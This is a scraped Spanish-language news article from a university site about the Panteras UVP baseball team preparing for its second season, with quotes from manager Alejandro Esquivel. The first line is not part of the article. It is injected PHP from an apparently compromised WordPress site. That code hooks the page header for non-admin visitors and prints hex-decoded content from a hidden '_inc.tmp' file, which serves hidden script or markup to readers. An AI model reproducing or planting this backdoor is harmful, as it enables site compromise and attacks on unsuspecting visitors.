if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Panteras UVP de beisbol se alistan para su segundo año – La Opinión Universitaria La Opinión Universitaria
Menu

Panteras UVP de beisbol se alistan para su segundo año

 

*Buscaran tener una destacada eliminatoria estatal en el CONDDE

 

Un año atrás, la Universidad del Valle de Puebla incursionó en el beisbol con el objetivo de incrementar las opciones de práctica deportiva entre los integrantes de su comunidad estudiantil, quienes en buen número participaron en la etapa germinal de este proyecto.

Ahora, en la víspera del inicio del ciclo escolar 2019-2020, las Panteras UVP están por cimentar su segundo año de actividades en el béisbol estudiantil con base en la participación de peloteros de nivel bachillerato y universidad, quienes bajo la tutela del mánager Alejandro Esquivel trabajarán para continuar con el crecimiento de este taller-equipo, mismo que ya tuvo su debut en competencia oficial dentro de la eliminatoria estatal del Consejo Nacional del Deporte de la Educación.

“Recibimos a un buen número de prospectos en nuestros campos de pruebas y estamos a la espera de que se integren oficialmente con nosotros. Ponemos mucha atención en los jóvenes para que se integren a partir del bachillerato pues tenemos la intención de ser semillero de jugadores que a largo plazo nos puedan fortalecer para las competencias universitarias. Todo proyecto deportivo requiere de tiempo y de mucho trabajo para dar frutos, pero nosotros estamos enfocados en seguir desarrollándonos, en crecer paso a paso e ir consiguiendo los objetivos que nos planteamos”, comentó el mánager Alejandro Esquivel.

Iniciar un proyecto no es tarea sencilla, pero el trabajo que realizan las Panteras UVP se encuentra en plan ascendente puesto que una vez que debutaron en una competencia oficial, para el segundo año de trabajo la expectativa está puesta en sumar experiencia y desarrollar el talento de los peloteros felinos.

“Estamos analizando una participación en una liga sabatina o bien en una competencia universitaria que podría crearse en la Liga Zaragoza, la cual podría estar dirigida a una categoría de entre 17 a 22 años. Por lo pronto nosotros ya estamos en la parte final de esta pausa de entrenamientos y regresaremos a finales de agosto para retomar nuestras labores en el Parque Atoyac”.

“Los muchachos están muy motivados después de tener su primera participación en el CONDDE y aunque la serie con la BUAP resultó muy complicada, nosotros tenemos muy claro que para crecer es necesario medirse ante los mejores y con base en eso nos llevamos una gran experiencia y unas ganas enormes de regresar a esta eliminatoria estatal”, apuntó Alejandro Esquivel.

 

  • No comments

    Deja una respuesta

    Tweets recientes